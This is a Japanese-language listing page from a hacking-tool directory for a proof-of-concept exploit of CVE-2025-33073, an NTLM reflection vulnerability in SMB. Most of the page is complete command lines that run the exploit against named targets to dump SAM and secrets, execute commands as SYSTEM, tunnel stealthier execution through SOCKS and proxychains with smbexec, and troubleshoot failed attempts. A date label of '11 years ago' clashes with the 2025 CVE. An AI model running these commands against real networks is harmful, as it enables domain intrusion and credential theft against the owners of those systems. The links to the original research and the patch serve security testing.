Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-33073 — NTLMリフレクションSMBの脆弱性に対するPoCエクスプロイト。 | Kitploit
ツール/GitHubGitHub/starscow/cve-2025-33073
脆弱性分析エクスプロイト横移動ポストエクスプロイトペネトレーションテストレッドチーミング
GitHubstarscow/cve-2025-33073

CVE-2025-33073

NTLMリフレクションSMBの脆弱性に対するPoCエクスプロイト。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-33073

NTLMリフレクションSMB脆弱性のPoCエクスプロイト。

すべてのクレジットは公式研究に帰属します:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

前提条件

OS: Kali Linux(ほとんどのパッケージがプリインストールされています)。

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py(リポジトリに含まれています)
  • xterm(GUIのみ)

使用例

GUI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

image

CLI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

image

カスタムコマンド
secretsdumpを実行する代わりに、カスタムコマンドを実行できます。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

image

SOCKS
SYSTEMとしての有効な接続確立後、よりステルスにコマンドを実行するためのオプションです。ここでは--targetと--target-ipは同じ値にする必要があります。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

image また、SAMのダンプの代わりにproxychains経由でカスタムコマンドを実行することもできます。

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

DNS要件なしの手動エクスプロイト

デバイスと同じブロードキャストドメインにいて、LLMNRポイズニングに対して脆弱な場合、DNSレコードを登録せずにデバイスをエクスプロイトすることが可能です。

image

トラブルシューティング

  • 攻撃にホスト名が使用され、KaliからのDNSルックアップが発生するため、攻撃が機能しないことがあります。KaliがDNSサーバーを使用していない場合や、impacket-ntlmrelayxから'/ FAILED'メッセージが表示される場合は、ホストを/etc/hostsファイルに追加してみてください。これにより攻撃が機能するはずです。
  • IPを使用する場合、攻撃は機能するはずです。失敗する代わりにSUCCESSになるまで複数回実行する必要がある場合があります。これが発生する理由は今のところ完全には明らかではありません。ネットワークに関係していると考えられます。
  • -Mまたは--methodを使用して別のcoerceメソッドを試してください。

Wireshark

ローカルNTLM認証が行われる場合 image

ローカルNTLM認証が行われず、FAILEDの試行となる場合 image

参考情報

  • xtermではマウスの中ボタンでコピー&ペーストが可能です。
  • DNSレコードはクライアントにも認識されている必要があり、場合によっては時間がかかることがあります。時間がかかるとは、数分待つ必要があるという意味です。
  • これは単なるPoCであり、AV/EDRバイパスは試行されていません。自己責任で使用してください。

修正方法

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

ツールをダウンロード